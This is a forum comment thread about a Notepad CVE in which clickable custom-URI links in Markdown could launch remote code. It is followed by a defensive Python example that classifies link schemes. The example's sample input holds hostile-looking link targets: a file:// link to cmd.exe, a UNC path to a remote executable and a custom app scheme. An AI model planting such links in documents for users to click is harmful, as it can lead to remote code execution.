Comment by procaryote
1 day ago
Markdown is readable as plain text, that's kind of the point of it
There's also a pretty large jump between "I can ask the system to open this link in the default browser" and "I have built my own link handling in a memory-unsafe language to support some really fringe features, and oops it's exploitable"
Except memory-unsafe and fringe features have nothing to do with this CVE, which seems incredibly dumb on the face of it.
Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!
I haven't had time to look at it in detail but surely the vulnerability is more than a "click a URL".
No, that's exactly what the vulnerability is as far as I know.
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...
Imagine some Markdown:
Wordpad, Notepad++ and many others highlight and let you double-click the URL in the first three lines, and yes they use the shell to open cmd.exe, yes they open remote shares (which if they're properly remote, the shell throws up a warning prompt asking if you want to connect). Wordpad always prompts if you want to open the link (and shows the link) before doing it, but you can click "Yes".
What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.
That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".
The fix is that clicking the link now gives a dialogue box asking if you really want to click it, and remember to click no if you're not sure.
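The policy the comment above argues for (a text editor should turn only http/https/file URIs into clickable links, and should prompt before handing the shell anything it could execute, such as a file:// target or a remote share) is easy to state as a scheme allowlist. The block below is an added example written for this page, not Notepad's, Wordpad's or Notepad++'s actual link handling; the sample Markdown, the `someapp://` scheme and the host names in it are constructed. It scans text for URL-like tokens and UNC paths and returns, for each one, whether an editor should open it directly, confirm with the user first, or not linkify it at all.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# The only schemes an editor turns into clickable links. Everything else
# (mailto:, custom app protocols, vendor-specific handlers) stays plain text,
# so there is nothing for a user to click.
LINKABLE_SCHEMES = {"http", "https", "file"}

# scheme:rest where the scheme is at least two characters, so a Windows
# drive letter like C:\path is not mistaken for a URL.
SCHEME_URL_RE = re.compile(
    r'(?<![\w+.-])([A-Za-z][A-Za-z0-9+.-]+):(?://)?[^\s<>()\[\]"\']+'
)
# Windows UNC path: \\host\share\... (the shell treats this as a remote share)
UNC_RE = re.compile(r'(?<!\S)\\\\[^\s\\]+\\[^\s<>()\[\]"\']+')


@dataclass(frozen=True)
class Link:
    text: str
    action: str   # "open", "confirm" or "ignore"
    reason: str


def classify(url: str) -> Link:
    """Decide what an editor should do when the user clicks this token."""
    if url.startswith("\\\\"):
        return Link(url, "confirm", "UNC path: the shell will connect to a remote share")
    parts = urlsplit(url)
    scheme = parts.scheme.lower()          # scheme matching is case-insensitive
    if scheme not in LINKABLE_SCHEMES:
        return Link(url, "ignore", f"scheme {scheme!r} is not in the allowlist")
    if scheme == "file":
        host = parts.netloc.lower()
        if host and host != "localhost":
            return Link(url, "confirm", f"file:// on remote host {host!r}")
        # Even a local file:// target goes to the shell, which will run an
        # executable rather than display it, so always ask first.
        return Link(url, "confirm", "file:// target is opened by the shell and may execute")
    if not parts.netloc:
        return Link(url, "ignore", "web URL without a host")
    return Link(url, "open", "web URL handed to the default browser")


def find_links(text: str) -> list[Link]:
    """Return every linkifiable token in text, in document order, with its decision."""
    found = [(m.start(), m.group(0)) for m in SCHEME_URL_RE.finditer(text)]
    found += [(m.start(), m.group(0)) for m in UNC_RE.finditer(text)]
    return [classify(token) for _, token in sorted(found)]


# Constructed sample Markdown (not the Markdown referred to in the thread).
SAMPLE = r"""Constructed sample, not the Markdown from the thread:
[docs](https://example.com/readme)
file:///C:/Windows/System32/cmd.exe
\\fileserver\share\tool.exe
mailto:someone@example.com
someapp://run?arg=1
"""

if __name__ == "__main__":
    for link in find_links(SAMPLE):
        print(f"{link.action:8} {link.text}  ({link.reason})")
```

Run it and the two web links are the only ones an editor would open without asking; the file:// and UNC entries get a confirmation dialogue that shows the target, and the mailto: and custom-scheme entries are never highlighted in the first place, which is the behaviour the comment says a text editor should have had from the start.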